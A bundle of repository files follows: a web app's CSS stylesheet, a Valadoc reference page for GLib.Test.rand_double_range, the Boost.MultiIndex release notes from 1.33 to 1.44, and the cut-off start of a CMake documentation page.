1px #FFF; background-color:#FFF; } .tb_control .summary a:hover, .tb_control .yiiPager a:hover { background-color:#DDD; border:solid 1px #DDD; } .tb_control .yiiPager li.selected a, .tb_control .summary a.active { background-color:#26292e; color:#fff; border-color:#26292e; } .tb_control .yiiPager > a:after { background-color:#FFF; border:1px solid #26292e; color:#26292e; } .shadow666 { -moz-box-shadow:1px 1px 1px #CCC; -webkit-box-shadow:1px 1px 1px #CCC; box-shadow:1px 1px 1px #CCC; } #newclient-form .portlet-separator.ui-state-active { border-bottom:1px solid #CCC; } #newclient-form .ui-accordion-content.ui-accordion-content-active { border-bottom:1px solid #CCC !important; } p.commentarea { background-color:#FFF; border:1px solid #FFF; } p.commentarea textarea { background-color:#FFF; color:#333; } p.commentarea:hover { border: 1px solid #c4c4c4; } p.commentarea textarea:focus { background-color:#FFF; } div.grippie { background-color:#F1F1F1 } .filters input[type="text"] { border:solid 1px #CCC; color:#333; background-color:#FFF; } /*noinspection CssInvalidPseudoSelector*/ .filters input[type="text"]:-webkit-autofill { background-color:white !important; } span.inputwrapper, span.selectwrapper { border-color:#C5C5C5; background-color:#E9E9E9; color:#2E2E2E; } span.inputwrapper input[type="text"], span.inputwrapper input[type="password"], .fileinput span.inputwrapper input { color:#2E2E2E; border-color:#C5C5C5; box-shadow:inset 0 0 1px 1px #DDD; -webkit-box-shadow:inset 0 0 1px 1px #DDD; } span.inputwrapper:hover { border-color:#c4c4c4; outline:none } span.static-label{ color: #999; } span.inputwrapper.static:hover { border-color:#F1F1F1; } .inputwrapper.withLabel label { color:#666; } .inputwrapper.withLabel:hover label { color:#000 } .inputwrapper.error, .selectwrapper.error { border: 1px solid #BC1010;} /*.inputwrapper.success, .selectwrapper.success { border: 1px solid #067719;}*/ button.k-button, .k-button { background-color:#fff; border-radius: 0; } button.k-button:active, button.k-button.active, .k-button:active, .k-button.active { border-color:#CCC; color:#333; background:-moz-linear-gradient(100% 100% 90deg, #E0E0E0, #D3D3D3) !important; background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#D3D3D3), to(#E0E0E0)) !important; background:-webkit-linear-gradient(#D3D3D3, #E0E0E0) !important; background:-o-linear-gradient(#D3D3D3, #E0E0E0) !important; } button.k-button:hover, .k-button:hover, #sortable-selected li:hover, #sortable-available li:hover { color: #333; background-color: #DDD; border-color:#CCC; } button.k-button.dark { border-right:solid 1px #26292e; border-bottom:solid 1px #26292e; border-top:solid 1px #222; border-left:solid 1px #222; background:-moz-linear-gradient(100% 100% 90deg, #1D1D1D, #333333) !important; background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#333333), to(#1D1D1D)) !important; background:-webkit-linear-gradient(#333333, #1D1D1D) !important; background:-o-linear-gradient(#333333, #1D1D1D) !important; color: #fff; } button.k-button.dark:hover {color:#ccc; background-color:#333; border:solid 1px #26292e;} .items .comment:nth-child(odd) { background-color:#FFF; } .comment_header { color:#666; border-top:solid 1px #DDD } .row.error { border: solid 1px #CE5B50; background: #FF9090; color: #FFF; } label.form-label, td.form-label, div.form-section td:first-child { color:#666 } ul.connectedSortable { border:solid 1px #BEBEBE; background-color:#FFF; } .connectedSortable li { border:solid 1px #C5C5C5; color:#2E2E2E; background:#e3e3e3 url("textures/highlight.png") 0 center repeat-x; } .connectedSortable li.box-placeholder { background-color:#DDD; } #tariff-mapping-widget .note { color:#666; } div.body-wrapper table td:hover span { color:#FFF; } div.body-wrapper table td span { background-color:#111; } table.statData td a { border-bottom:1px solid #BEBEBE; border-top:1px solid #fff; } table.statData td a:hover { background-color:#E1E1E1 } table.statData td a > span { color:#999; } table.statData td a > strong { color:#333 } table.statData td:first-child a { border-right: 1px solid #BEBEBE; } table.statData td:last-child a { border-left: 1px solid #fff; } #fields ul li:hover { background-color:#FFF } #fields ul li a:hover { color:#FFF; } textarea.readonly,input.readonly{background-color:#fff; color: gray;} .infotable.k-content{background-color:#F1F1F1;} .k-widget > span.k-picker-wrap{background-color: #B1B1B1;border-color: #B1B1B1;} .k-widget > span.k-picker-wrap input{color: #fff;} .check_credit_score_box.red {background: #FAC8C8; color: #BC1237; border: 1px solid #BC1237;} .check_credit_score_box.green {background: #A8F299; color: #207D25; border: 1px solid #207D25;} .check_credit_score_box.orange {background: #FFCC00; color: #CC6600; border: 1px solid #CC6600;} div.icons > a.awesome_icon, div.portlet-buttons > a.awesome_icon {color: #aaa; } div.icons > a.awesome_icon:hover, div.portlet-buttons > a.awesome_icon:hover {color: #eee;} table thead.items tr { color:#202020; } thead.head-wrapper { border-bottom:solid 1px #CCC; background-color:#F1F1F1; } .grid-inner table tbody tr:hover { background-color:#FFFF00 !important; } .grid-inner table tbody tr.odd { background-color:#E8E8E8; } .grid-inner table td:hover span:not(.no-hover) { color:#FFF; } .grid-inner table tbody td span:not(.no-hover) { background-color:#111; } .grid-inner table tbody tr:hover, .grid-inner table tbody tr.selected, .grid-inner table tbody tr.odd.selected, .grid-inner table tbody tr.odd:hover{background-color:#FFFF00 !important} table .inline-label-custom { color: #999; } table .label-custom-left { color: #999; } .buttonsetwrapper .ui-buttonset .ui-button.ui-state-active, .button-dark { background-color: #26292e !important; border-color: #26292e !important; color: #fff !important; } td.multiselect-header { background: none repeat scroll 0 0 #ddd !important; color: inherit !important; color: #666 !important; } .redactor_toolbar li a:hover { background-color: #ffff00 !important; color: #000 !important; } .chosen-container.chosen-container-single.chosen-container-active.chosen-with-drop a.chosen-single { border:solid 1px #c4c4c4; } .chosen-container .chosen-results li.highlighted { background-color:#FFFF00 !important; color:#000 } .chosen-container.chosen-container-single a.chosen-single:hover { border:solid 1px #c4c4c4 } .chosen-container-single .chosen-drop { border:1px solid #c4c4c4 !important; border-top:0 !important} .inner-portlet .portlet-header {background: #DDD;} .inner-portlet .portlet-header .button_box{border:1px solid #eee; background:#eee; margin-right:5px;} .inner-portlet .portlet-header .fa{color:#23262c;} .inner-portlet .portlet-header .portlet-title {color:#23262c} .ui-buttonset .ui-button.ui-state-default{border-color:#FFF !important;} .ui-buttonset .ui-button.ui-state-hover{border-color:#DDD !important;} /* sidebar.css */ .bottom-wrapper{ background-color:#2f3238; } #sidebar { background:#2f3238; } #sidebar .menu-section h3 { color:#7f8289;background:#2f3238; } #sidebar .bottom-menu li a span{ color: #ffff00; } #sidebar .menu-section ul li a { color:#e2e2e2;border-bottom: 1px solid #2f3238;background:#26292e; } #sidebar .menu-section ul li a.active, #sidebar .menu-section ul li a:hover, #sidebar .menu-section ul li a.toggled { color:#FFFF00;border-left: 2px solid #ffff00; } #sidebar .menu-section ul li a .counter { background:#479ccf;color:#fff; } #sidebar .bottom-menu>ul>li>a { background:#26292e; } #sidebar .bottom-menu>ul>li>a:hover i { color:#FFFF00; } #sidebar .bottom-menu>ul>li>a i { color:#CBD3DB; } #sidebar .bottom-menu>ul>li .menu li a { color:#CCC; } #sidebar .bottom-menu>ul>li .menu li a:hover { color:#000; } #sidebar .bottom-menu>ul>li { border-top:1px solid #545454; } #sidebar .bottom-menu>ul>li>a .flag { background:#9ed166; } #sidebar .bottom-menu>ul>li .menu { background:#fff; } #sidebar .bottom-menu>ul>li .menu li { border-bottom:1px solid #E6E6E6; } #sidebar .current-user .menu { background:#fff; } #sidebar .current-user .name { color:#DFE8F0; } #sidebar .current-user .menu li { border-bottom:1px solid #E6E6E6; } #sidebar .current-user .menu li a { color:#4C5661; } #sidebar .current-user .menu li a:hover { color:#000; } @media (max-width:1200px) { #sidebar .menu-section ul { border-left: 1px solid #7f8289; } #sidebar .menu-section ul li>.submenu { background:#2a313a; } } /* loader.css */ .pace .pace-progress { background: #FFFF00; } /* label.css */ span.inputwrapper.error > input[type="text"], span.inputwrapper.error > input[type="password"] { border-left: 3px solid #BC1010; background-color: transparent !important; color:#BC1010; } /*span.inputwrapper.success > input[type="text"], span.inputwrapper.success > input[type="password"] { border-left: 3px solid #067719;background-color: transparent !important; color:#067719; }*/ span.inputwrapper.error > input[type="text"] ~ label[placeholder]:before, span.inputwrapper.error > input[type="password"] ~ label[placeholder]:before { color:#BC1010; } /*span.inputwrapper.success > input[type="text"] ~ label[placeholder]:before, span.inputwrapper.success > input[type="password"] ~ label[placeholder]:before { color:#067719; }*/ span.inputwrapper > input[type="text"]:focus, span.inputwrapper > input[type="password"]:focus { border-color:#00bafa; border-left: 3px solid #0082FF; background-color: transparent !important; color:#0082FF; } span.inputwrapper > input.readonly:focus { background-color:#F1F1F1 !important; } span.inputwrapper > input[type="text"]:focus ~ label[placeholder]:before, span.inputwrapper > input[type="password"]:focus ~ label[placeholder]:before { color:#3C77D4; } span.inputwrapper > input[type="text"] ~ label[placeholder]:before, span.inputwrapper > input[type="password"] ~ label[placeholder]:before, span.selectwrapper > select + label[placeholder]:before{ color:#999; } span.k-combobox + label[placeholder]:before { color:#999; } span.selectwrapper > select, span.inputwrapper input[type="text"], span.inputwrapper input[type="password"], .fileinput span.inputwrapper input { border-color: #F1F1F1; } span.inputwrapper, span.selectwrapper { border-color: #fff; background-color: #fff; } .button_box { background-color: #26292e; border: 1px solid #26292e; color: #AAA;} div.fieldwrapper { background-color:none; } span.unit { color:#888; } .green-color { color : green; } .red-color { color : red; } .gray-color-6{ color : #666; } .black-color{ color : #000; } .orange-color{ color:#EFB000; } .btf_date_style { float:left; line-height:25px; padding-left:5px; font-size:11px; color:#666; } .cities_matching_container {} .cities_matching { border: 1px solid #BEBEBE; max-height: 200px; overflow: auto; background-color: #fff; } .cities_matching table { width: 100%; } .cities_matching table tr td { border-bottom: 1px solid #EEE; white-space: nowrap; padding-left: 10px; } .cities_matching table tr td:last-child { width: 99%; } tr.no_match td { background-color: #FAC8C8; } .btd_border_left { float:left; width:1%; border-left:1px solid #FFFFFF; } .btd_border_right { width:40%; border-right: 1px solid #CCCCCC; } .draft_background { background-color:#ffff99; } .tab_auto_err { text-align: center; margin:0 auto; line-height: 20px; color: #BC1010; } .import_errors { color: #ff0000; } .login_fail_close { margin-right:5px; color:#222; } .k-picker-wrap { overflow:hidden } .k-picker-wrap > input { background:none !important; color:#AAA; box-shadow:none; -webkit-box-shadow:none !important; } .k-picker-wrap.k-state-hover > input { color:#FFF; } .interfaceForm_err { text-align: center; margin:0 auto; line-height: 20px; color: #BC1010; } .test-form .errorSummary a { float: none; color: #0000ff; } .message-header { background-color: #DDDDDD; border-bottom: 1px solid #CCCCCC !important; border-top: 1px solid #FFFFFF !important; clear: both; font-weight: bold; line-height: 30px; overflow: hidden; padding: 0 10px; } .message-body { padding:20px 10px; } .message-footer { background-color: #DDDDDD; border-bottom: 1px solid #CCCCCC !important; border-top: 1px solid #FFFFFF !important; clear: both; font-weight: bold; line-height: 30px; overflow: hidden; padding: 0 10px; } div.icons > a, div.portlet-buttons > a.font-awesome { margin:auto; font-size:18px; color: #ccc; } .right-form-section-err { font-size:11px; color:#888; } .reportform td.label, .reportform label.label { color: #666666; font-size: 11px; padding-right: 5px; text-align: left;} .reportingresult .portlet-content { overflow-x: auto; overflow-y: hidden; background-color: #F1F1F1; border-bottom: none; } div.infotable > table tr.header td{ color: #848484; } #pwd_change_dlg {display:none;} #pwd_change_dlg table.form-table td {width: 200px;} #pwd_change_dlg .status_msg {padding-bottom: 10px;} #pwd_change_dlg .right-button{float: right; padding: 0 20px;} table.pwd-strong-marker {width: 100%; display: none;} table.pwd-strong-marker td {width: 33%; border-left: 2px solid #F1F1F1; background-color: #CBCBCB; text-align: center; color: #666; padding: 0; font-size: 11px;} .form-section table.pwd-strong-marker td:first-child {max-width: none; min-width: 1px; text-align: center; border-left: none;} table.pwd-strong-marker span {display: none;} table.pwd-strong-marker.weak td:first-child {background-color: #FF8080;} table.pwd-strong-marker.weak span.weak {display: inline;} table.pwd-strong-marker.medium td {background-color: #FFFFA0;} table.pwd-strong-marker.medium td:last-child {background-color: #CBCBCB;} table.pwd-strong-marker.medium span.medium {display: inline;} table.pwd-strong-marker.strong td {background-color: #80FF80;} table.pwd-strong-marker.strong span.strong {display: inline;} span.cke_skin_kama { background: none repeat scroll 0 0 #fff !important; border: 1px solid #d3d3d3 !important; border-radius: 0 !important; padding: 5px !important; } .qresult_info { color: #666 !important; } .qform_btn { padding:0 20px; background-color:#1F5F30 !important; color:white; } #QueryResponse table.normal-header {width: 100%; height: 40px; background-color: #F1F1F1;} #QueryResponse table.normal-header td {padding: 0px 20px 0 0; vertical-align: top; text-align: left; white-space: nowrap; background-color: #F1F1F1;} #QueryResponse .active-section {display: none; background-color: #e1e1e1; padding: 10px 0 18px 0;} #QueryResponse table.active-header {cursor: pointer; background-color: #e1e1e1; height: 52px; color: #fff; width: 100%;} #QueryResponse table.active-content td {white-space: nowrap; background-color: #e1e1e1;} #QueryResponse table.tariff-details td {padding: 2px 10px; color:#000;} #QueryResponse .search-results-none {background-color: #FAC8C8; border-top: 1px solid #E2A9A9 !important; padding: 5px 15px 10px 10px;} #QueryResponse .search-results-none p {font-size: 14px; text-align: center; color: #BC1010;} #QueryResponse .large-text {font-size: 18px; font-weight: bold; color: #000} #QueryResponse .provider-info {font-size: 14px; color : #000} #QueryResponse .money-saving-info {font-size: 14px;color : #000}
doc/glib-2.0/GLib.Test.rand_double_range.html
themightyug/ledborg-server
<?xml version="1.0" encoding="utf-8"?> <html> <head> <title>GLib.Test.rand_double_range -- Vala Binding Reference</title> <link href="../style.css" rel="stylesheet" type="text/css"/><script src="../scripts.js" type="text/javascript"> </script> </head> <body> <div class="site_header">GLib.Test.rand_double_range Reference Manual</div> <div class="site_body"> <div class="site_navigation"> <ul class="navi_main"> <li class="package_index"><a href="../index.html">Packages</a></li> </ul> <hr class="navi_hr"/> <ul class="navi_main"> <li class="package"><a href="index.htm">glib-2.0</a></li> </ul> <hr class="navi_hr"/> <ul class="navi_main"> <li class="namespace"><a href="GLib.html">GLib</a></li> </ul> <hr class="navi_hr"/> <ul class="navi_main"> <li class="namespace"><a href="GLib.Test.html">Test</a></li> </ul> <hr class="navi_hr"/> <ul class="navi_main"> <li class="method"><a href="GLib.Test.add_data_func.html">add_data_func</a></li> <li class="method"><a href="GLib.Test.add_func.html">add_func</a></li> <li class="method"><a href="GLib.Test.bug.html">bug</a></li> <li class="method"><a href="GLib.Test.bug_base.html">bug_base</a></li> <li class="method"><a href="GLib.Test.fail.html">fail</a></li> <li class="method"><a href="GLib.Test.init.html">init</a></li> <li class="method"><a href="GLib.Test.log_set_fatal_handler.html">log_set_fatal_handler</a></li> <li class="method"><a href="GLib.Test.maximized_result.html">maximized_result</a></li> <li class="method"><a href="GLib.Test.message.html">message</a></li> <li class="method"><a href="GLib.Test.minimized_result.html">minimized_result</a></li> <li class="method"><a href="GLib.Test.perf.html">perf</a></li> <li class="method"><a href="GLib.Test.quick.html">quick</a></li> <li class="method"><a href="GLib.Test.quiet.html">quiet</a></li> <li class="method"><a href="GLib.Test.rand_bit.html">rand_bit</a></li> <li class="method"><a href="GLib.Test.rand_double.html">rand_double</a></li> <li class="method">rand_double_range</li> <li class="method"><a href="GLib.Test.rand_int.html">rand_int</a></li> <li class="method"><a href="GLib.Test.rand_int_range.html">rand_int_range</a></li> <li class="method"><a href="GLib.Test.run.html">run</a></li> <li class="method"><a href="GLib.Test.slow.html">slow</a></li> <li class="method"><a href="GLib.Test.thorough.html">thorough</a></li> <li class="method"><a href="GLib.Test.timer_elapsed.html">timer_elapsed</a></li> <li class="method"><a href="GLib.Test.timer_last.html">timer_last</a></li> <li class="method"><a href="GLib.Test.timer_start.html">timer_start</a></li> <li class="method"><a href="GLib.Test.trap_assert_failed.html">trap_assert_failed</a></li> <li class="method"><a href="GLib.Test.trap_assert_passed.html">trap_assert_passed</a></li> <li class="method"><a href="GLib.Test.trap_assert_stderr.html">trap_assert_stderr</a></li> <li class="method"><a href="GLib.Test.trap_assert_stderr_unmatched.html">trap_assert_stderr_unmatched</a></li> <li class="method"><a href="GLib.Test.trap_assert_stdout.html">trap_assert_stdout</a></li> <li class="method"><a href="GLib.Test.trap_assert_stdout_unmatched.html">trap_assert_stdout_unmatched</a></li> <li class="method"><a href="GLib.Test.trap_fork.html">trap_fork</a></li> <li class="method"><a href="GLib.Test.trap_has_passed.html">trap_has_passed</a></li> <li class="method"><a href="GLib.Test.trap_reached_timeout.html">trap_reached_timeout</a></li> <li class="method"><a href="GLib.Test.verbose.html">verbose</a></li> </ul> </div> <div class="site_content"> <h1 class="main_title">rand_double_range</h1> <hr class="main_hr"/> <h2 class="main_title">Description:</h2> <div class="main_code_definition"><span class="main_keyword">public</span> <span class="main_basic_type"><a href="double.html" class="struct">double</a></span> <b><span css="method">rand_double_range</span></b> () </div><br/> <div class="namespace_note"><b>Namespace:</b> GLib.Test</div> <div class="package_note"><b>Package:</b> glib-2.0</div> </div> </div><br/> <div class="site_footer">Generated by <a href="http://www.valadoc.org/">Valadoc</a> </div> </body> </html>
dependencies/boost-1.46.0/libs/multi_index/doc/release_notes.html
gorkinovich/DefendersOfMankind
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0.1 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Boost.MultiIndex Documentation - Release notes</title> <link rel="stylesheet" href="style.css" type="text/css"> <link rel="start" href="index.html"> <link rel="prev" href="future_work.html"> <link rel="up" href="index.html"> <link rel="next" href="acknowledgements.html"> </head> <body> <h1><img src="../../../boost.png" alt="boost.png (6897 bytes)" align= "middle" width="277" height="86">Boost.MultiIndex Release notes</h1> <div class="prev_link"><a href="future_work.html"><img src="prev.gif" alt="future work" border="0"><br> Future work </a></div> <div class="up_link"><a href="index.html"><img src="up.gif" alt="index" border="0"><br> Index </a></div> <div class="next_link"><a href="acknowledgements.html"><img src="next.gif" alt="acknowledgements" border="0"><br> Acknowledgements </a></div><br clear="all" style="clear: all;"> <hr> <h2>Contents</h2> <ul> <li><a href="#boost_1_44">Boost 1.44 release</a></li> <li><a href="#boost_1_43">Boost 1.43 release</a></li> <li><a href="#boost_1_42">Boost 1.42 release</a></li> <li><a href="#boost_1_41">Boost 1.41 release</a></li> <li><a href="#boost_1_38">Boost 1.38 release</a></li> <li><a href="#boost_1_37">Boost 1.37 release</a></li> <li><a href="#boost_1_36">Boost 1.36 release</a></li> <li><a href="#boost_1_35">Boost 1.35 release</a></li> <li><a href="#boost_1_34">Boost 1.34 release</a></li> <li><a href="#boost_1_33_1">Boost 1.33.1 release</a></li> <li><a href="#boost_1_33">Boost 1.33 release</a></li> </ul> <h2><a name="boost_1_44">Boost 1.44 release</a></h2> <p> <ul> <li> Fixed a bug preventing the use of <code>modify_key</code> with rollback in <a href="reference/ord_indices.html#modify_key">ordered</a> and <a href="reference/hash_indices.html#modify_key">hashed</a> indices when <code>Modifier</code> and <code>Rollback</code> are different types (ticket <a href="https://svn.boost.org/trac/boost/ticket/4130">#4130</a>). </li> </ul> </p> <h2><a name="boost_1_43">Boost 1.43 release</a></h2> <p> <ul> <li> <a href="../../serialization/doc/serialization.html#constructors">Serialization of non default constructible values</a> is now properly supported through user-provided facilities <code>save_construct_data</code> and <code>load_construct_data</code>. <code>multi_index_container</code> serialization <a href="../../serialization/doc/tutorial.html#versioning">class version</a> has been bumped from 1 to 2. </li> </ul> </p> <h2><a name="boost_1_42">Boost 1.42 release</a></h2> <p> <ul> <li>Maintenance fixes.</li> </ul> </p> <h2><a name="boost_1_41">Boost 1.41 release</a></h2> <p> <ul> <li>Serialization now uses the portable <a href="../../serialization/doc/wrappers.html#collection_size_type"><code>collection_size_type</code></a> type instead of the original <code>std::size_t</code> (ticket <a href="https://svn.boost.org/trac/boost/ticket/3365">#3365</a>). <code>multi_index_container</code> serialization <a href="../../serialization/doc/tutorial.html#versioning">class version</a> has been bumped from 0 to 1. </li> <li>Fixed a concurrency bug in the implementation of <a href="tutorial/debug.html#safe_mode">safe mode</a> (ticket <a href="https://svn.boost.org/trac/boost/ticket/3462">#3462</a>). </li> </ul> </p> <h2><a name="boost_1_38">Boost 1.38 release</a></h2> <p> <ul> <li>These constructs are deprecated: <ul> <li><code>nth_index_iterator&lt;MultiIndexContainer,N&gt;::type</code>,</li> <li><code>multi_index_container&lt;...&gt;::nth_index_iterator&lt;N&gt;::type</code>,</li> <li><code>nth_index_const_iterator&lt;MultiIndexContainer,N&gt;::type</code>,</li> <li><code>multi_index_container&lt;...&gt;::nth_index_const_iterator&lt;N&gt;::type</code>,</li> <li><code>index_iterator&lt;MultiIndexContainer,Tag&gt;::type</code>,</li> <li><code>multi_index_container&lt;...&gt;::index_iterator&lt;Tag&gt;::type</code>,</li> <li><code>index_const_iterator&lt;MultiIndexContainer,Tag&gt;::type</code>,</li> <li><code>multi_index_container&lt;...&gt;::index_const_iterator&lt;Tag&gt;::type</code>.</li> </ul> Use the following instead: <ul> <li><code>nth_index&lt;MultiIndexContainer,N&gt;::type::iterator</code>,</li> <li><code>multi_index_container&lt;...&gt;::nth_index&lt;N&gt;::type::iterator</code>,</li> <li><code>nth_index&lt;MultiIndexContainer,N&gt;::type::const_iterator</code>,</li> <li><code>multi_index_container&lt;...&gt;::nth_index&lt;N&gt;::type::const_iterator</code>,</li> <li><code>index&lt;MultiIndexContainer,Tag&gt;::type::iterator</code>,</li> <li><code>multi_index_container&lt;...&gt;::index&lt;Tag&gt;::type::iterator</code>,</li> <li><code>index&lt;MultiIndexContainer,Tag&gt;::type::const_iterator</code>,</li> <li><code>multi_index_container&lt;...&gt;::index&lt;Tag&gt;::type::const_iterator</code>.</li> </ul> </li> <li>Maintenance fixes.</li> </ul> </p> <h2><a name="boost_1_37">Boost 1.37 release</a></h2> <p> <ul> <li>Maintenance fixes.</li> </ul> </p> <h2><a name="boost_1_36">Boost 1.36 release</a></h2> <p> <ul> <li><a name="stable_update">On prior versions of the library, the <a href="tutorial/indices.html#hash_updating">update member functions</a> of hashed indices could alter the position of an element even if the associated key did not change with the update. This is legal but probably unexpected behavior. The functions have been rewritten to provide the additional guarantee that elements with unmodified key will not change position in hashed indices, just as always was the case with ordered indices. These guarantees are now documented in the reference.</a></li> <li>Added the constructor <code>multi_index_container::multi_index_container(const allocator_type&amp;)</code> to mimic the equivalent interface in STL sequence containers. <li>Maintenance fixes.</li> </ul> </p> <h2><a name="boost_1_35">Boost 1.35 release</a></h2> <p> <ul> <li>New <a href="tutorial/key_extraction.html#global_fun"><code>global_fun</code></a> predefined key extractor. </li> <li>Added <a href="tutorial/indices.html#iterator_to"><code>iterator_to</code></a> facility. </li> <li>Included <a href="tutorial/creation.html#special_allocator">support for non-standard allocators</a> such as those of <a href="../../interprocess/index.html">Boost.Interprocess</a>, which makes <code>multi_index_container</code>s placeable in shared memory. </li> <li>New versions of <code>modify</code> and <code>modify_key</code> with rollback, as described in the <a href="tutorial/basics.html#ord_updating">tutorial</a>. </li> <li>Indices provide the new <code>cbegin</code>, <code>cend</code> and, when applicable, <code>crbegin</code> and <code>crend</code> member functions, in accordance with the latest drafts of the next revision of the C++ standard. </li> <li>Hinted insertion in ordered indices fully conforms to the resolutions of C++ Standard Library <a href="http://www.open-std.org/jtc1/sc22/wg21/docs/lwg-defects.html#233">Defect Report 233</a>. The new requirement that the point of insertion be always as close as possible to the hint induces a different behavior than exhibited in former releases of Boost.MultiIndex, which can potentially cause backwards compatibility problems; in any case, the likelihood of these compatibility issues arising in a real scenario is very low. </li> <li>Sequenced and random access indices now follow the requirements of the C++ standard for sequence containers with respect to the operations <code>assign(f,l)</code> and <code>insert(p,f,l)</code> (23.1.1/9): if <code>f</code> and <code>l</code> are of the same integral type, the iterator-based overloads of these member functions are avoided: <blockquote><pre> <span class=keyword>typedef</span> <span class=identifier>multi_index_container</span><span class=special>&lt;</span> <span class=keyword>int</span><span class=special>,</span><span class=identifier>indexed_by</span><span class=special>&lt;</span><span class=identifier>sequenced</span><span class=special>&lt;&gt;</span> <span class=special>&gt;</span> <span class=special>&gt;</span> <span class=identifier>sequenced_container</span><span class=special>;</span> <span class=identifier>std</span><span class=special>::</span><span class=identifier>list</span><span class=special>&lt;</span><span class=keyword>int</span><span class=special>&gt;</span> <span class=identifier>l</span><span class=special>(...);</span> <span class=identifier>sequenced_container</span> <span class=identifier>c</span><span class=special>;</span> <span class=comment>// iterator-based overload of assign</span> <span class=identifier>c</span><span class=special>.</span><span class=identifier>assign</span><span class=special>(</span><span class=identifier>l</span><span class=special>.</span><span class=identifier>begin</span><span class=special>(),</span><span class=identifier>l</span><span class=special>.</span><span class=identifier>end</span><span class=special>());</span> <span class=comment>// The following is equivalent to // c.assign( // static_cast&lt;sequenced_container::size_type&gt;(10),100); // that is, &quot;10&quot; and &quot;100&quot; are not taken to be iterators as // in the previous expression.</span> <span class=identifier>c</span><span class=special>.</span><span class=identifier>assign</span><span class=special>(</span><span class=number>10</span><span class=special>,</span><span class=number>100</span><span class=special>);</span> </pre></blockquote> </li> <li>The performance of ordered indices <code>range</code> and <code>equal_range</code> has been improved. </li> <li>Maintenance fixes.</li> </ul> </p> <h2><a name="boost_1_34">Boost 1.34 release</a></h2> <p> <ul> <li>Added <a href="tutorial/indices.html#rnd_indices">random access indices</a>. </li> <li>Non key-based indices provide new <a href="tutorial/indices.html#rearrange">rearrange facilities</a> allowing for interaction with external mutating algorithms. </li> <li>All predefined Boost.MultiIndex key extractors instantiated for a given type <code>T</code> can handle objects of types derived from or convertible to <code>T</code> (and <a href="reference/key_extraction.html#chained_pointers">chained pointers</a> to those). Previously, only objects of the exact type specified (along with <code>reference_wrapper</code>s and chained pointers to them) were accepted. </li> <li><a href="reference/key_extraction.html#composite_key_compare"><code>composite_key_compare</code></a> and related classes accept operands not included in tuples as if they were passed in a tuple of length 1; this allows the user to omit tuple enclosing in lookup operations involving composite keys when only the first key is provided. </li> <li>The core algorithms of ordered indices have been optimized, yielding an estimated reduction of about 5% in insertion times. </li> <li>Size of ordered indices node headers have been reduced by 25% on most platforms, using a well known <a href="tutorial/indices.html#ordered_node_compression">optimization technique</a>. </li> <li>The tutorial has been restructured, new examples added.</li> <li>Maintenance fixes.</li> </ul> </p> <h2><a name="boost_1_33_1">Boost 1.33.1 release</a></h2> <p> <ul> <li>For ordered and hashed indices, <code>erase(it)</code> and <code>erase(first,last)</code> now return an iterator to the element following those being deleted (previously nothing was returned), in accordance with the C++ Standard Library <a href="http://www.open-std.org/jtc1/sc22/wg21/docs/lwg-defects.html#130">Defect Report 130</a> and issue 6.19 of TR1 <a href="http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1837.pdf">Issues List</a>. </li> <li>Boost.MultiIndex offers the usual guarantees with respect to multithreading code provided by most STL implementations: <ol> <li>Concurrent access to different containers is safe.</li> <li>Concurrent read-only access to the same container is safe.</li> </ol> In previous versions of the library, the latter guarantee was not properly maintained if the <a href="tutorial/debug.html#safe_mode">safe mode</a> was set. This problem has been fixed now. </li> <li>Maintenance fixes.</li> </ul> </p> <h2><a name="boost_1_33">Boost 1.33 release</a></h2> <p> <ul> <li>Added <a href="tutorial/indices.html#hashed_indices">hashed indices</a>, whose interface is based on the specification for unordered associative containers by the C++ Standard Library Technical Report (TR1). </li> <li>Added <a href="tutorial/creation.html#serialization">serialization support</a> for <a href="../../serialization/index.html">Boost.Serialization</a>. </li> <li>Destruction of <code>multi_index_container</code>s and <code>clear</code> memfuns now perform faster. </li> <li>Internal changes aimed at reducing the length of symbol names generated by the compiler; cuts of up to a 50% can be achieved with respect to the Boost 1.32 release. This results in much shorter and more readable error messages and has also a beneficial impact on compilers with strict limits on symbol name lengths. Additionally, a section on further <a href="compiler_specifics.html#symbol_reduction">reduction of symbol name lengths</a> has been added. </li> <li>Restructured some parts of the documentation, new examples.</li> <li>Maintenance fixes.</li> </ul> </p> <hr> <div class="prev_link"><a href="future_work.html"><img src="prev.gif" alt="future work" border="0"><br> Future work </a></div> <div class="up_link"><a href="index.html"><img src="up.gif" alt="index" border="0"><br> Index </a></div> <div class="next_link"><a href="acknowledgements.html"><img src="next.gif" alt="acknowledgements" border="0"><br> Acknowledgements </a></div><br clear="all" style="clear: all;"> <br> <p>Revised April 22nd 2010</p> <p>&copy; Copyright 2003-2010 Joaqu&iacute;n M L&oacute;pez Mu&ntilde;oz. Distributed under the Boost Software License, Version 1.0. (See accompanying file <a href="../../../LICENSE_1_0.txt"> LICENSE_1_0.txt</a> or copy at <a href="http://www.boost.org/LICENSE_1_0.txt"> http://www.boost.org/LICENSE_1_0.txt</a>) </p> </body> </html>
platform/windows/support/cmake/doc/cmake/html/variable/CTEST_GIT_UPDATE_OPTIONS.html
libcrosswind/libcrosswind
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>CTEST_GIT_UPDATE_OPTIONS &mdash; CMake 3.15.1 Documentation</title> <link rel="stylesheet" href="../_static/cmake.css" type="text/css" /> <link rel="stylesheet" href="../_static/pygments.css" type="text/css" /> <script type="text/javascript" src="../_static/documentation_options.js"></script> <script type="text/javascript" src="../_static/jquery.js"></script> <script type="text/javascript" src="../_static/underscore.js"></script> <script type="text/javascript" src="../_static/doctools.js"></script> <link rel="shortcut icon" href="../_static/cmake-favicon.ico"/> <link rel="index" title="Index" href="../genindex.html" /> <link rel="search" title="Search" href="../search.html" /> <link rel="next" title="CTEST_HG_COMMAND" href="CTEST_HG_COMMAND.html" /> <link rel="prev" title="CTEST_GIT_UPDATE_CUSTOM" href="CTEST_GIT_UPDATE_CUSTOM.html" /> </head><body> <div class="related" role="navigation" aria-label="related navigation"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../genindex.html" 